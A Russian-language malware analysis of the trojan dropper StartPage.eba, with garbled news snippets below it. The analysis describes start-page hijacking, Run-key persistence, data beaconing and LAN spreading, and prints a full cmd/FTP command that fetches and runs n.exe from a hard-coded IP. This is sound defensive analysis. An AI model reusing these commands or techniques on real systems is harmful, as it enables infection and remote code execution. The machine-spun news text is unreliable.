Методы обнаружения вирусов

Trojan-Dropper.Win32.StartPage.eba

Время детектирования 29 июн 2011 13:10 MSK
Время выпуска обновления 29 июн 2011 15:00 MSK
Описание опубликовано 10 окт 2011 11:30 MSK

Технические детали
Деструктивная активность

Технические детали

Троянская программа, которая устанавливает и запускает другое программное обеспечение на зараженном компьютере без ведома пользователя. Является приложением Windows (PE EXE-файл). Имеет размер 25169 байта. Программа упакована неизвестным упаковщиком. Распакованный размер –около 74 КБ. Написана на C++.


Деструктивная активность

Если в пути к файлу троянца отсутствовала последовательность символов "ommon", тогда троянец извлекает из своего тела и запускает на исполнение скрипт со случайным именем: %ProgramFiles%\.hta (md5: D7444767D527E6E97BD3EB85D60E800D) - последовательность из трех символов латинского алфавита, например, "YSQ". Данный файл имеет размер 803 байта и детектируется антивирусом Касперского как Trojan.VBS.StartPage.hw. Запуск данного вредоносного скрипта приводит к изменению стартовой страницы, а также поисковой страницы, используемой по умолчанию, браузера Internet Explorer путем добавления следующей информации в ключи системного реестра: [HKCU\Software\Microsoft\Internet Explorer\Main] "Start Page" = "www.5***ling.com" "Search Page" = "www.5***iling.com" "default_page_url" = "www.5***ling.com" а также обеспечивает автоматический запуск копии троянца при каждом следующем старте системы: [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe После этого троянец создает копию своего файла с именем "coiome.exe" и удаляет свой оригинальный файл: %ProgramFiles%\Common Files\sebsbvx\coiome.exe При этом файлу устанавливает дату создания "17.08.2009", а каталогу, в котором находится копия троянца, устанавливает атрибуты "скрытый" и "системный": %ProgramFiles%\Common Files\sebsbvx При создании своей копии троянец может добавлять в файл случайную последовательность символов, таким образом хэши файлов копий троянца будут различаться. Также троянец может добавлять в файл последовательность символа "2", таким образом увеличивая размер своей копии. После этого троянец запускает на исполнение свою копию и завершает выполнение. Троянец загружает файл со следующего URL: http://j.q***800.com/b.jpg сохраняет загруженный файл с именем: %WinDir%\Fonts\oh.ini Данный фал является файлом конфигурации и используется троянцем в дальнейшем. Используя системный файл: %System%\sc.exe устанавливает автоматический запуск службам со следующими именами: lanmanworkstation lanmanserver RpcLocator Browser NtLmSsp LmHosts После этого запускает на исполнение вышеперечисленные службы, используя системный файл: %System%\net1.exe Далее троянец отправляет запрос на сервер злоумышленника с целью передать в запросе данные о зараженном компьютере: http://tj.q***800.com/t/Count.asp?mac=&ver=01&t=<имя пользователя компьютера> На момент создания описания с сервера приходил следующий ответ: addok Для сокрытия своей работы в Интернет в отдельном потоке удаляет файлы из каталогов: %userprofile%\Cookies\*.* %userprofile%\Local Settings\Temporary Internet Files\*.* %userprofile%\Local Settings\Temp\Cookies\*.* Перед удалением у файлов снимает атрибуты "только чтение", "скрытый", "системный" и "архивный". Создает каталог с именем: %AppData%\f.exe Удаляет информацию из реестра о службе с именем: JavaServe Удаляет файлы: %ProgramFiles%\Internet Explorer\usp10.dll %WinDir%\ModFan\mone.dll %WinDir%\UoDo\game.dll Троянец извлекает из своего тела файл: %WinDir%\Tasks\i.vbe - последовательность из 3-х случайных латинских символов. Данный файл имеет размер 2117 байт. Файл является вспомогательным и используется для дальнейшей работы троянца. После этого извлекает из своего тела файл: %WinDir%\Tasks\e.exe - последовательность из 3-х случайных букв латинского алфавита, например, "DNP". Данный файл детектируется антивирусом Касперского как Exploit.Win32.IMG-WMF.fk. В извлеченный файл дописывает время работы компьютера пользователя, таким образом хэш файла будет различаться при каждом создании. Также троянец может добавлять в файл последовательность символа "0", таким образом файл может иметь различный размер от 3748 байт. Троянец определяет IP-адрес компьютера пользователя, затем читает и расшифровывает ранее извлеченный файл конфигурации с именем: %WinDir%\Fonts\oh.ini из этого файла троянец получает один из параметров, с которыми запускает файл: %WinDir%\Tasks\e.exe <параметр1> <параметр2> <параметр1> - IP-адрес (троянец перебирает IP-адреса локальной сети в которой находился зараженный компьютер) <параметр2> - расшифрованный URL, полученный из файла конфигурации. На момент создания описания в файле конфигурации была следующая ссылка: http://dh***88.org/p/mi.exe (32891 байт, детектируется антивирусом Касперского как Trojan-Downloader.Win32.Geral.adeh) После этого выполняет команду следующего вида: %System%\cscript.exe %WinDir%\Tasks\i.vbe administrator "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe" Таким образом троянец пытается загрузить на атакуемый компьютер и запустить на исполнение файл с FTP-сервера с именем "n.exe", после успешного запуска удаляет этот файл. Перед завершением работы удаляет файл: %ProgramFiles%\.hta
НОВОЕ НА САЙТЕ

17 апреля 2024 года

В 2023 году самыми всераспространенными Android-угрозами стали троянские программы, демонстрирующие рекламу. Шпионские троянские приложения по уподоблению с прошлым годом понизили свою энергичность таково словно стали вторыми по числу детектирований на защищаемых антивирусом Dr.Web устройствах. невзирая на то, словн... Вирусные новости

11 апреля 2024 года

Компания «Доктор Веб» 4 апреля сообщила о выпуске обновления для продуктов линейки Dr.Web Enterprise Security Suite, сертифицированных ФСТЭК России.

Обновление ориентировано н... Антивирус Dr.Web

4 апреля 2024 года

Компания «Доктор Веб» информирует о выпуске обновления Dr.Web Desktop Security Suite (для Windows), Dr.Web Server Security Suite (для Windows), Dr.Web Mail Security Suite (для MS Exchange) так как Агента Dr.Web для Windows в составе сертифицированного ФСТЭК нашей родины Dr.Web Enterprise Security Suite (сертификат соответствия №3509). В рамках ... Антивирус Dr.Web

1 апреля 2024 года

Согласно этим статистики детектирований Dr.Web для мобильных механизмов Android, в феврале 2024 лета несравнимо возросла энергичность маркетинговых троянских программ из семейства Android.HiddenAdsВирусные новости

1 апреля 2024 года

Анализ статистики детектирований антивируса Dr.Web в феврале 2024 лета отобразил рост общего числа найденных опасностей на 1,26% по уподоблению с январем. При данном количество удивительных опасностей снизилось на 0,78%. фаворитные позиции по численности детектирований снова заняли всевозможные маркетинговые... Вирусные новости

Main menu


Sub menu